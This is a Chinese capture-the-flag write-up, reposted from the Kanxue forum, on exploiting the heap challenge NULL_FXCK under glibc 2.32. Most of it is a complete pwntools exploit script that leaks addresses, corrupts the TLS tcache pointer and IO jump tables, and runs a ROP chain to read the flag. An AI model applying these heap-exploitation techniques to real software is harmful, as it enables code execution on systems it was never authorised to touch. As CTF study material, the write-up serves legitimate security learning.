其他
从PWN题NULL_FXCK中学到的glibc知识
本文为看雪论坛精华文章
看雪论坛作者ID:Nameless_a
版本:
沙箱:
保护:
ida
思路
堆风水泄露libc和堆地址。
记另一个堆块为N
fwd=N->fd;
bck=N->bk;
if(fwd->bk != N || bck->fd !=N) exit(-1);
fwd->bk=bck;
bck->fd=fwd;
我们发现,切割2和3合并的堆块会有一个剩下的堆块我们记作L。L的地址和3离得很近,可能就是低两位不同。如果,3的低两位是'\x00',我们就通过将L和0放入unsorted bin 设置bk指针。
house of kiwi
......
assert ((old_top == initial_top (av) && old_size == 0) ||
((unsigned long) (old_size) >= MINSIZE &&
prev_inuse (old_top) &&
((unsigned long) old_end & (pagesize - 1)) == 0));
......
TLS段tcache struct attack
总结
exp
from pwn import *
from hashlib import sha256
import base64
context.log_level='debug'
#context.arch = 'amd64'
context.arch = 'amd64'
context.os = 'linux'
def proof_of_work(sh):
sh.recvuntil(" == ")
cipher = sh.recvline().strip().decode("utf8")
proof = mbruteforce(lambda x: sha256((x).encode()).hexdigest() == cipher, string.ascii_letters + string.digits, length=4, method='fixed')
sh.sendlineafter("input your ????>", proof)
##r=remote("123.57.69.203",7010)
##r=process('./sp1',env={"LD_PRELODA":"./libc-2.27.so"})
##mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
def z():
gdb.attach(r)
def cho(num):
r.sendafter(">> ",str(num))
def add(size,content='\x00'):
cho(1)
r.sendlineafter("Size: ",str(size))
r.sendafter("Content: ",content)
def edit(idx,con):
cho(2)
r.sendlineafter("Index: ",str(idx))
r.sendafter("Content: ",con)
def show(idx):
cho(4)
r.sendlineafter("Index: ",str(idx))
def delet(idx):
cho(3)
r.sendlineafter("Index: ",str(idx))
def exp():
global r
global libc
libc=ELF('./libc-2.32.so')
r=process('./main')
##[+]: fengshui 2 leak
add(0x418) #0
add(0x1f8) #1
add(0x428) #2
add(0x438) #3
add(0x208) #4
add(0x428) #5
add(0x208) #6
delet(0)
delet(3)
delet(5)
delet(2)
##z()
add(0x440,0x428*'a'+p64(0xc91)) #0
add(0x418) #3 0x2b0
add(0x418) #2
add(0x428) #5 0x370
##z()
delet(3)
delet(2)
##z()
add(0x418,'a'*9) #2
add(0x418) #3
delet(3)
delet(5)
add(0x9f8) #3
##z()
add(0x428,'a') #5
edit(6,0x200*'a'+p64(0xc90)+'\x00')
add(0x418) #7
##z()
add(0x208) #8
##z()
delet(3)
add(0x430,flat(0,0,0,p64(0x421))) #3
add(0x1600) #9
##z()
show(4)
libcbase=u64(r.recv(6).ljust(8,'\x00'))-0x1e4230
log.success('libcbase:'+hex(libcbase))
show(5)
heap=u64(r.recv(6).ljust(8,'\x00'))-0x2b0
log.success('heap:'+hex(heap))
##[+]: set libc func
IO_file_jumps=0x1e54c0+libcbase
IO_helper_jumps=0x1e48c0+libcbase
setcontext=libcbase+libc.sym['setcontext']
open_addr=libcbase+libc.sym['open']
read_addr=libcbase+libc.sym['read']
puts_addr=libcbase+libc.sym['puts']
pop_rdi_ret=libcbase+0x2858f
pop_rsi_ret=libcbase+0x2ac3f
pop_rdx_pop_rbx_ret=libcbase+0x1597d6
ret=libcbase+0x26699
##[+]: large bin attack to reset TLS
##z()
##edit(4,p64(libcbase+0x1e4230)+)
##[+]: orw
target=heap+0x8e0
flag_addr = heap + 0x8e0 + 0x100
chain = flat(
pop_rdi_ret , flag_addr , pop_rsi_ret , 0 , open_addr,
pop_rdi_ret , 3 , pop_rsi_ret , flag_addr , pop_rdx_pop_rbx_ret , 0x100 , 0 , read_addr,
pop_rdi_ret , flag_addr , puts_addr
).ljust(0x100,'\x00') + 'flag\x00'
TLS=libcbase-0x2908
add(0x1240,0x208*'a'+p64(0x431)+0x428*'a'+p64(0x211)+0x208*'a'+p64(0xa01))
delet(0)
add(0x440,chain)
##z()
add(0x418) #11
add(0x208) #12
delet(5)
delet(4)
add(0x1240,0x208*'a'+p64(0x431)+p64(libcbase+0x1e3ff0)*2+p64(heap+0x1350)+p64(TLS-0x20))#4
delet(11)
##z()
add(0x500)
##z()
add(0x410)
delet(4)
add(0x1240,0x208*'a'+p64(0x431)+p64(libcbase+0x1e3ff0)*2+p64(heap+0x1350)*2)
pd='\x01'*0x70
pd=pd.ljust(0xe8,'\x00')+p64(IO_file_jumps+0x60)
pd=pd.ljust(0x168,'\x00')+p64(IO_helper_jumps+0xa0)+p64(heap+0x46f0)
add(0x420,pd) #13
add(0x100,p64(setcontext+61))
add(0x200,p64(target)+p64(ret))
add(0x210,p64(0)+p64(0x910))
z()
add(0x1000)
##z()
r.recvuntil('flag')
string=r.recvuntil('}')
flag='flag'+string
print(flag)
show(5)
r.interactive()
if __name__ == '__main__':
exp()
##setcontext and orw
''''
orw=p64(r4)+p64(2)+p64(r1)+p64(free_hook+0x28)+p64(syscall)
orw+=p64(r4)+p64(0)+p64(r1)+p64(3)+p64(r2)+p64(mem)+p64(r3)+p64(0x20)+p64(0)+p64(syscall)
orw+=p64(r4)+p64(1)+p64(r1)+p64(1)+p64(r2)+p64(mem)+p64(r3)+p64(0x20)+p64(0)+p64(syscall)
orw+=p64(0xdeadbeef)
pd=p64(gold_key)+p64(free_hook)
pd=pd.ljust(0x20,'\x00')+p64(setcontext+61)+'./flag\x00'
pd=pd.ljust(0xa0,'\x00')+p64(free_hook+0xb0)+orw
r.sendafter(">>",pd)
flag=r.recvline()
'''
看雪ID:Nameless_a
https://bbs.pediy.com/user-home-943085.htm
# 往期推荐
球分享
球点赞
球在看
点击“阅读原文”,了解更多!